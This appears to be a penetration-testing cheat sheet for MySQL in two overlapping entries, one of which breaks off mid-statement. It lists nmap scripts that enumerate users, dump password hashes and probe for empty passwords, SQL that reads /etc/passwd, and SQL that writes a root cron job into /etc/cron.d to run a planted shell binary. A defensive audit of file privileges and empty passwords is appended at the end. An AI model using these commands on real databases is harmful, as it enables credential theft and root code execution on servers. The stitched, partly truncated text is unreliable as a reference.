-
Enumeration

Mandatory

Try to connect to the DB.

Enumerate with nmap:

    nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target

Optional

If you have access to the DB:

Try to read local files:

    SELECT load_file('/etc/passwd');

Try to write files:

    CREATE TABLE bbb(content TEXT);
    INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");
    SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';
-
Connect:

    mysql --host=10.10.10.13 -P4444 -u admin admin

Various commands:

Enumeration

Nmap scripts

    nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim
    proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim

Exploitation

Read and write

Read with the current process id:

    SELECT load_file('/etc/passwd');

Write as the daemon process id:

    CREATE TABLE bbb(content TEXT);
    INSERT INTO bbb (content)…
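A server-side audit of the conditions that the load_file read and the INTO OUTFILE write in both entries above depend on, together with the empty-password condition the nmap script looks for. This is an added example, not part of the original notes; it assumes MySQL 5.7 or later and an administrative account, and 'app'@'%' is a hypothetical account name.

```sql
-- 1. Where may the server process read and write files on behalf of SQL?
--    ''   (empty) : no restriction, load_file()/INTO OUTFILE work on any
--                   path the mysqld OS user can reach
--    path         : limited to that directory
--    NULL         : file import/export is disabled
SELECT @@GLOBAL.secure_file_priv AS secure_file_priv;

-- 2. Which accounts hold the global FILE privilege?
--    Both load_file() and SELECT ... INTO OUTFILE require it.
SELECT GRANTEE, IS_GRANTABLE
FROM information_schema.USER_PRIVILEGES
WHERE PRIVILEGE_TYPE = 'FILE'
ORDER BY GRANTEE;

-- 3. Which unlocked accounts have no password set?
--    Accounts using the auth_socket plugin legitimately show an empty
--    authentication_string, so the plugin column is listed for review.
SELECT user, host, plugin
FROM mysql.user
WHERE (authentication_string = '' OR authentication_string IS NULL)
  AND account_locked = 'N'
ORDER BY user, host;

-- 4. Remediation for an application account that does not need file access.
--    'app'@'%' is a hypothetical account name; substitute the grantee
--    reported by query 2.
REVOKE FILE ON *.* FROM 'app'@'%';

-- secure_file_priv is read-only at runtime. Set it in the option file
-- and restart the server, for example:
--   [mysqld]
--   secure_file_priv = NULL
```

Run the queries before and after the change; query 2 should list only the accounts that genuinely need import or export, and query 1 should return NULL or a dedicated directory.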